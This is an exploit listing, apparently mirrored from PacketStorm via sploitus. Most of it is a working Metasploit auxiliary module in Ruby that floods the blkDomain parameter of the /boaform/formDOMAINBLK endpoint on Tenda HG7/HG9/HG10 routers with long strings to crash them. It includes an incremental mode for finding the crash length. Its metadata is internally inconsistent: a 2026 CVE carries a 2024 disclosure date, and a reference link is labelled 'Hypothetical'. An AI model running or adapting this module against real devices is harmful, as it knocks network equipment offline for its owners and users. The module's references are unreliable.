Share
## https://sploitus.com/exploit?id=PACKETSTORM:225132
==================================================================================================================================
    | # Title     : Tenda HG7/HG9/HG10 formDOMAINBLK Stack Buffer Overflow Metasploit DoS Module                                     |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.tendacn.com/material/show/105719                                                                     |
    ==================================================================================================================================
    
    [+] Summary    :  This module is a Metasploit auxiliary scanner/DoS module designed to test a stack-based buffer overflow condition affecting specific Tenda router models through the /boaform/formDOMAINBLK endpoint. 
                      The issue is associated with oversized input supplied to the blkDomain parameter, potentially causing service instability or device crashes.
    
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Scanner
      include Msf::Auxiliary::Report
      include Msf::Auxiliary::Dos
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Tenda HG7/HG9/HG10 formDOMAINBLK Stack Buffer Overflow DoS',
            'Description' => %q{
              This module triggers a stack-based buffer overflow vulnerability in the
              /boaform/formDOMAINBLK endpoint of Tenda HG7, HG9, and HG10 routers.
              The vulnerability exists in the 'blkDomain' parameter.
              Sending an overly long string causes a crash and denial of service.
            },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2026-11499'],
              ['URL', 'https://github.com/0xBlackash/CVE-2026-11499'] # Hypothetical
            ],
            'DisclosureDate' => '2024-01-15',
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'SideEffects' => [DOS_MODULE],
              'Reliability' => []
            },
            'DefaultOptions' => {
              'RPORT' => 80,
              'SSL' => false
            }
          )
        )
    
        register_options([
          OptInt.new('PAYLOAD_LENGTH', [false, 'Length of the buffer overflow payload', 400]),
          OptBool.new('INCREMENTAL', [false, 'Incrementally increase payload size', false]),
          OptInt.new('STEP_SIZE', [false, 'Incremental step size', 50]),
          OptInt.new('START_LENGTH', [false, 'Starting length for incremental mode', 100]),
          OptInt.new('END_LENGTH', [false, 'Ending length for incremental mode', 1000]),
          OptInt.new('DELAY', [false, 'Delay between requests in incremental mode (seconds)', 2])
        ])
      end
    
      def run_host(ip)
        target_url = "http://#{ip}:#{rport}"
    
        if datastore['INCREMENTAL']
          print_status("Incremental mode - finding approximate crash offset...")
          start_len = datastore['START_LENGTH']
          end_len = datastore['END_LENGTH']
          step = datastore['STEP_SIZE']
          delay = datastore['DELAY']
    
          (start_len..end_len).step(step) do |length|
            print_status("Testing length: #{length}")
            send_payload(target_url, length)
            print_status("Waiting #{delay} seconds...")
            sleep(delay)
          end
        else
          send_payload(target_url, datastore['PAYLOAD_LENGTH'])
        end
    
        print_good("DoS attempt completed. Check if #{ip} is responsive.")
      end
    
      def send_payload(target_url, length)
        payload = 'A' * length
    
        data = {
          'blkDomain' => payload,
          'submit-url' => '/domainblk.asp',
          'page' => 'domainblk'
        }
    
        begin
          res = send_request_cgi({
            'method' => 'POST',
            'uri' => '/boaform/formDOMAINBLK',
            'vars_post' => data,
            'headers' => {
              'Referer' => "#{target_url}/domainblk.asp"
            }
          }, datastore['WfsDelay'])
    
          if res
            print_good("HTTP Status: #{res.code}")
            return true
          else
            print_status("No response (timeout/refused) - likely crashed")
            return true
          end
        rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Errno::ECONNRESET
          print_status("Connection error - crash successful!")
          return true
        rescue => e
          print_error("Error: #{e.message}")
          return false
        end
      end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================